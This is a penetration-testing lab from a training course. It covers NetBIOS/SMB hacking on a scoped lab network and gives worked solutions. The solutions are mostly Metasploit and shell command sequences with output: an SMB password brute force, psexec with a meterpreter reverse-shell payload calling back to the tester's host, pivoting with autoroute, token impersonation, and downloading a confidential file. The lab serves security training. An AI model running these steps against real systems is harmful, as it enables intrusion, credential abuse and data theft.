Lab 09.0 - NetBIOS Hacking


HERA

LAB ID: 9

NETBIOS HACKING
[NetBIOS Hacking] LAB ID: 9

1. LAB
In this engagement you’re asked to check if it is possible to access the
documents of the organization from outside the corporate networks.

This is what your client has defined as scope of tests:

- Machine with public IP address: 10.130.40.70
- Organization network: 172.30.111.0/24

The machine with IP 10.130.40.70 can directly communicate with the corporate network machines through an IPsec tunnel. This is a laptop given by the organization to all of its remote workers. This machine has access to the corporate documents, so it has been included in the scope.

The following image summarizes the Lab environment:

eLearnSecurity s.r.l. © 2012 | H E R A 2



2. GOALS
Access documents stored in restricted shares within the organization network.

3. WHAT YOU WILL LEARN

- Testing NetBIOS/SMB shares
- Exploiting weak passwords
- Exploiting null sessions

4. RECOMMENDED TOOLS

- Metasploit
- Nmap
- Winfo


5. TASKS
Task 1. Open ports

The only publicly reachable target is machine 10.130.40.70. Gather some information about the machine and use tools like Nmap to discover whether the host has ports 139/445 open.

Task 2. File shares

Use the nbtstat command (Windows) or the nmblookup command (Linux) to display the NetBIOS name table.

Task 3. Null session

Check whether a null session can be established.

Task 4. SMB bruteforce

The anonymous account works, but it does not have enough privileges to obtain any useful information or share from the target. Try a bruteforce attack to get working credentials.

Tip: you can use the Metasploit smb_login module or the Nmap smb-brute script.

Task 5. Enumerate shares and info

By now, you should have discovered working credentials. You can now try
to enumerate shares and host information.

Task 6. Exploit the machine

Exploit the machine using Metasploit psexec module. You will have to use
the credentials discovered at Task 4.


Task 7. Host discovery

Use the meterpreter session to discover hosts within the organization network.

Task 8. Null session and file retrieval

Repeat Task 3 for each host discovered, check if null sessions are
available and then try to access shared files.


Solutions


Task 1. Open ports

In order to discover whether ports 139 and 445 are open, we can run Nmap with the following settings:
>>nmap -p139,445 10.130.40.70

As we can see from the results both ports are open.

Task 2. File shares

To display the NetBIOS name table we can use the following commands:

Windows:
> nbtstat -a 10.130.40.70


Linux:
>>nmblookup -A 10.130.40.70

The <20> suffix signifies that the host has file sharing enabled.
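As an added illustration (not part of the lab material), the following Python parses nmblookup -A style output and reports what each registered name means, so the <20> check can be automated over saved scan output. The sample output is constructed for this example, and the parser assumes Samba's nmblookup column layout, not the layout of Windows nbtstat.

```python
import re

# Well-known NetBIOS name suffixes relevant to this lab; the same suffix means
# different things for unique and group names.
SUFFIX_MEANING = {
    ("00", False): "workstation service",
    ("00", True): "domain/workgroup name",
    ("20", False): "file server service (shares enabled)",
    ("1e", True): "browser service elections",
}

# One entry line of `nmblookup -A` output, e.g.
#   ELS-WIN7        <20> -         B <ACTIVE>
#   WORKGROUP       <00> - <GROUP> B <ACTIVE>
ENTRY_RE = re.compile(
    r"^\s*(?P<name>\S+)\s+<(?P<suffix>[0-9a-fA-F]{2})>\s+-\s+"
    r"(?P<group><GROUP>)?\s*(?P<node>[BPMH])\s+<(?P<flags>[^>]+)>"
)

def parse_name_table(text):
    """Return one dict per NetBIOS name registered by the host."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue  # header, blank and MAC address lines
        suffix = m.group("suffix").lower()
        is_group = m.group("group") is not None
        entries.append({
            "name": m.group("name"),
            "suffix": suffix,
            "group": is_group,
            "active": m.group("flags").upper() == "ACTIVE",
            "meaning": SUFFIX_MEANING.get((suffix, is_group), "unknown"),
        })
    return entries

def file_sharing_enabled(entries):
    """True when an active unique <20> name (the Server service) is registered."""
    return any(e["suffix"] == "20" and not e["group"] and e["active"] for e in entries)

# Constructed sample in nmblookup format; host name from the lab, MAC made up.
SAMPLE = """Looking up status of 10.130.40.70
\tELS-WIN7        <00> -         B <ACTIVE>
\tWORKGROUP       <00> - <GROUP> B <ACTIVE>
\tELS-WIN7        <20> -         B <ACTIVE>
\tWORKGROUP       <1e> - <GROUP> B <ACTIVE>
\tMAC Address = 00-00-00-00-00-00
"""
```

Calling file_sharing_enabled(parse_name_table(SAMPLE)) returns True because of the active unique <20> entry.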

Task 3. Null session

Since file share is enabled, we can try to enumerate files and folders with
anonymous login:

Windows:
> net use \\10.130.40.70\IPC$ "" /u:""
> net view 10.130.40.70


Linux:
>>smbclient -L 10.130.40.70

We are able to log in without credentials, but we cannot retrieve any information. This happens because of a security policy that withholds useful information unless proper credentials are provided.


Task 4. SMB bruteforce

Since we cannot get information as the anonymous user, we can try to brute force SMB and look for weak credentials. To do so we can use the Metasploit smb_login module as follows:
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set PASS_FILE /root/Desktop/default.pwd
PASS_FILE => /root/Desktop/default.pwd
msf auxiliary(smb_login) > set USER_FILE /root/Desktop/minimal.usr
USER_FILE => /root/Desktop/minimal.usr
msf auxiliary(smb_login) > set RHOSTS 10.130.40.70
RHOSTS => 10.130.40.70
msf auxiliary(smb_login) > run

[*] 10.130.40.70:445 SMB - Starting SMB login bruteforce
[-] 10.130.40.70 - This system allows guest sessions with any credentials, these instances will not be reported.
[-] 10.130.40.70:445 SMB - [11/56] - |WORKGROUP - FAILED LOGIN (Windows 7 Professional 7600) administrator : 123456789 (STATUS_LOGON_FAILURE)
[*] Auth-User: "administrator"
[+] 10.130.40.70:445|WORKGROUP - SUCCESSFUL LOGIN (Windows 7 Professional 7600) 'administrator' : 'password'
[-] 10.130.40.70:445 SMB - [13/56] - |WORKGROUP - FAILED LOGIN (Windows 7 Professional 7600) administrator : iloveyou (STATUS_LOGON_FAILURE)
[*] Auth-User: "test"
[+] 10.130.40.70:445|WORKGROUP - SUCCESSFUL LOGIN (Windows 7 Professional 7600) 'test' : '12345'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
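From the defender's side, the pattern above (a run of STATUS_LOGON_FAILURE results followed by a success for the same account from the same source) is what the target's Security log records as 4625 and 4624 events. The following Python is added here and is not part of the lab: it flags that pattern over constructed sample events; the flattened log format, the threshold and the time window are assumptions for this example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of Windows Security events from the target, flattened to
# "timestamp event_id logon_type user source_ip status". 4625 is a failed logon,
# 4624 a successful one; logon type 3 (network) is what SMB authentication
# produces. Addresses follow the lab, timestamps are constructed.
SAMPLE_EVENTS = """\
2012-07-23T17:40:01 4625 3 administrator 172.16.10.5 0xC000006A
2012-07-23T17:40:02 4625 3 administrator 172.16.10.5 0xC000006A
2012-07-23T17:40:02 4625 3 administrator 172.16.10.5 0xC000006A
2012-07-23T17:40:03 4625 3 administrator 172.16.10.5 0xC000006A
2012-07-23T17:40:03 4625 3 administrator 172.16.10.5 0xC000006A
2012-07-23T17:40:04 4624 3 administrator 172.16.10.5 0x0
2012-07-23T17:40:05 4625 3 test 172.16.10.5 0xC000006A
2012-07-23T17:40:06 4624 3 test 172.16.10.5 0x0
2012-07-23T17:55:00 4625 3 els 172.30.111.10 0xC000006A
"""

def detect_smb_bruteforce(text, threshold=5, window=timedelta(minutes=5)):
    """Flag a source once it produces `threshold` failed network logons inside
    `window`, then flag every successful logon from that source afterwards."""
    failures = defaultdict(deque)   # source ip -> timestamps of recent 4625s
    flagged = set()
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, logon_type, user, src, _status = line.split()
        if logon_type != "3":       # only network logons matter for SMB
            continue
        t = datetime.fromisoformat(ts)
        if event_id == "4625":
            q = failures[src]
            q.append(t)
            while t - q[0] > window:   # forget failures outside the window
                q.popleft()
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("bruteforce", src, user, ts))
        elif event_id == "4624" and src in flagged:
            alerts.append(("success_after_bruteforce", src, user, ts))
    return alerts

if __name__ == "__main__":
    for kind, src, user, ts in detect_smb_bruteforce(SAMPLE_EVENTS):
        print(f"{ts} {kind:<25} {src} user={user}")
```

The single failure from 172.30.111.10 never reaches the threshold, so only the source that brute-forced and then logged in is reported.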


Task 5. Enumerate shares and info

We have discovered working credentials, and we can now enumerate host information. There are many tools and commands that we can use to do it. The following command uses an Nmap script to enumerate users:
>>nmap --script=smb-enum-users -p 445 10.130.40.70 --script-args smbuser=administrator,smbpass=password

We can enumerate shares using the following commands:

Linux:
>>smbclient -L 10.130.40.70 -U administrator

Windows:
>>net use \\10.130.40.70\IPC$ password /u:administrator
>>net view \\10.130.40.70


Other tools like winfo will return the following information:


Task 6. Exploit the machine

Knowing working credentials, we can try to gain backdoor access to the machine using the Metasploit psexec module. This will allow us to use this machine as a pivot to access the organization's corporate network.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 10.130.40.70
RHOST => 10.130.40.70
msf exploit(psexec) > set SMBPass password
SMBPass => password
msf exploit(psexec) > set SMBUser administrator
SMBUser => administrator
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 172.16.10.5
LHOST => 172.16.10.5
msf exploit(psexec) > exploit

[*] Started reverse handler on 172.16.10.5:4444
[*] Connecting to the server...
[*] Authenticating to 10.130.40.70:445|WORKGROUP as user 'administrator'...
[*] Uploading payload...
[*] Created \qFWyTYZY.exe...
[*] Sending stage (752128 bytes) to 10.130.40.70
[*] Closing service handle...
[*] Deleting \qFWyTYZY.exe...
[*] Meterpreter session 1 opened (172.16.10.5:4444 -> 10.130.40.70:49201) at 2012-07-23 17:45:58 +0200

meterpreter >


Task 7. Host discovery

In order to discover hosts inside the organization network with ports 139/445 open, we can use the module auxiliary/scanner/portscan/tcp. First we need to set the route to the network and then use the tcp module as follows:

meterpreter > run autoroute -s 172.30.111.0/24


[*] Adding a route to 172.30.111.0/255.255.255.0...
[+] Added route to 172.30.111.0/255.255.255.0 via 10.130.40.70
[*] Use the -p option to list all active routes
meterpreter > background
[*] Backgrounding session 1...
msf exploit(psexec) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 172.30.111.0/24
RHOSTS => 172.30.111.0/24
msf auxiliary(tcp) > set THREADS 10
THREADS => 10
msf auxiliary(tcp) > set PORTS 139,445
PORTS => 139,445
msf auxiliary(tcp) > run

[*] 172.30.111.10:139 - TCP OPEN
[*] 172.30.111.10:445 - TCP OPEN
[*] Scanned 027 of 256 hosts (010% complete)
[*] Scanned 059 of 256 hosts (023% complete)
[*] Scanned 077 of 256 hosts (030% complete)
[*] Scanned 104 of 256 hosts (040% complete)
[*] Scanned 128 of 256 hosts (050% complete)
[*] Scanned 158 of 256 hosts (061% complete)
[*] Scanned 180 of 256 hosts (070% complete)
[*] Scanned 206 of 256 hosts (080% complete)
[*] Scanned 231 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Only host 172.30.111.10 has ports 139/445 open. Let’s focus on it.


Task 8. Null session

Now that we have discovered a potential target, we can use the same commands used in Task 3 to detect whether null sessions are available. To do so we can run the OS shell on the exploited machine. Note that the shell will run as the SYSTEM user.
meterpreter > shell
Process 1540 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

We need to impersonate another user. Let's change it with the following commands:
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
eLS-Win7\Administrator
eLS-Win7\eLS
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

// Choose the user to impersonate

meterpreter > impersonate_token eLS-Win7\\Administrator
[+] Delegation token available
[+] Successfully impersonated user eLS-Win7\Administrator

meterpreter > shell



Process 3220 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
els-win7\administrator

C:\Windows\system32>

As you can see we are now running the shell as user administrator. We
can now run the net view command on the target host:
C:\Windows\system32>net view 172.30.111.10
net view 172.30.111.10
Shared resources at 172.30.111.10

Share name Type Used as Comment

-------------------------------------------------------------------------
C Disk
FooComShare Disk
My Documents Disk
The command completed successfully.

C:\Windows\system32>

As we can see from the results, we are able to list shares without any
credentials.

Note that we can get the same information in many different ways. We
can use the exploited machine as pivot or use Metasploit modules like
smb_enumshares as follows:


msf > use auxiliary/scanner/smb/smb_enumshares
msf auxiliary(smb_enumshares) > set RHOSTS 172.30.111.10
RHOSTS => 172.30.111.10
msf auxiliary(smb_enumshares) > run
[*] 172.30.111.10:139
[*] 172.30.111.10:139

My Documents - (DISK),
IPC$ - Remote IPC (IPC),
C - (DISK),
ADMIN$ - Remote Admin (DISK),
C$ - Default share (DISK),
FooComShare - (DISK)

[*] Auxiliary module execution completed
msf auxiliary(smb_enumshares) >

As you can see, without using any credential, we are able to enumerate
shares for the whole subnet. We can now navigate organization machine
shares. To do that, we can use the net use command as follows:
C:\>net use K: \\172.30.111.10\FooComShare
net use K: \\172.30.111.10\FooComShare
The command completed successfully.

C:\>K:
K:

K:\>dir
dir
Volume in drive K has no label.
Volume Serial Number is F441-FDC7

Directory of K:\

07/24/2012 12:33 AM <DIR> .
07/24/2012 12:33 AM <DIR> ..
07/24/2012 12:43 AM 458 Confidential.txt
1 File(s) 458 bytes
2 Dir(s) 984,576,000 bytes free
K:\>


Now that we are able to browse the share's content, we can download it to our machine to read the files. The following command downloads the content of the share to our machine:
meterpreter > download K:\\ /root/Desktop/TargetShare -r
[*] downloading: K:\\Confidential.txt ->
/root/Desktop/TargetShare/Confidential.txt
[*] downloaded : K:\\Confidential.txt ->
/root/Desktop/TargetShare/Confidential.txt
meterpreter >

This file will be the ultimate proof for the client that the organization files
are not safe and that policies and proper configurations should be
implemented inside and outside the perimeter.
